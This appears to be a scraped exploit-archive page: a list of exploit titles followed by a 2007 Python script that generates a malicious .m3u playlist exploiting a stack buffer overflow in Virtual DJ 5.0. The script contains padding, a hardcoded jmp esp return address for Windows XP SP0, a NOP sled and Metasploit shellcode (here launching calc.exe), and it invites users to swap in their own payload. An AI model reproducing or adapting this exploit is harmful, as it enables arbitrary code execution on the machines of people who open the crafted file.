477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
32 lines
1.6 KiB
Python
Executable file
32 lines
1.6 KiB
Python
Executable file
#Virtual DJ 5.0 Local Buffer OverFlow
|
|
#224 bytes available for shellcode,, you can replace it with you favourite one,,
|
|
#ret addr -> 0x7199403D jmp esp in mswsock.dll Winxp sp0
|
|
#exploit : [A x 484] +[EIP - jmp esp - 4] + [Nops -10] + [Shellcode -224]
|
|
#Discovred by 0x58 && Coded By miyy3t,,Midt's lab !!
|
|
#Greetz : M.i.d.t,, Diablos5s5s,, Simo64 ,, s4mi,, issam ,, Metasploit,,Str0ke & All Mor0Ccan & Muslims h4xorz
|
|
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
|
|
|
|
shellcode = "\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x84"
|
|
shellcode+= "\xd1\xfe\xd8\x83\xeb\xfc\xe2\xf4\x78\x39\xba\xd8\x84\xd1\x75\x9d"
|
|
shellcode+= "\xb8\x5a\x82\xdd\xfc\xd0\x11\x53\xcb\xc9\x75\x87\xa4\xd0\x15\x91"
|
|
shellcode+= "\x0f\xe5\x75\xd9\x6a\xe0\x3e\x41\x28\x55\x3e\xac\x83\x10\x34\xd5"
|
|
shellcode+= "\x85\x13\x15\x2c\xbf\x85\xda\xdc\xf1\x34\x75\x87\xa0\xd0\x15\xbe"
|
|
shellcode+= "\x0f\xdd\xb5\x53\xdb\xcd\xff\x33\x0f\xcd\x75\xd9\x6f\x58\xa2\xfc"
|
|
shellcode+= "\x80\x12\xcf\x18\xe0\x5a\xbe\xe8\x01\x11\x86\xd4\x0f\x91\xf2\x53"
|
|
shellcode+= "\xf4\xcd\x53\x53\xec\xd9\x15\xd1\x0f\x51\x4e\xd8\x84\xd1\x75\xb0"
|
|
shellcode+= "\xb8\x8e\xcf\x2e\xe4\x87\x77\x20\x07\x11\x85\x88\xec\x21\x74\xdc"
|
|
shellcode+= "\xdb\xb9\x66\x26\x0e\xdf\xa9\x27\x63\xb2\x9f\xb4\xe7\xff\x9b\xa0"
|
|
shellcode+= "\xe1\xd1\xfe\xd8"
|
|
|
|
bof = "A"*484+"\x3D\x40\x99\x71"+"\x90"*10+shellcode
|
|
|
|
file = open('c:\/xploit.m3u','w+')
|
|
file.write("#EXTM3U\n");
|
|
file.write("#EXTINF:0,TITLE\n")
|
|
file.write("C:/")
|
|
file.write(bof)
|
|
file.close()
|
|
|
|
print "Exploit generated in c:\/xploit.m3u ...now open it with virtual dj !! "
|
|
|
|
# milw0rm.com [2007-09-02]
|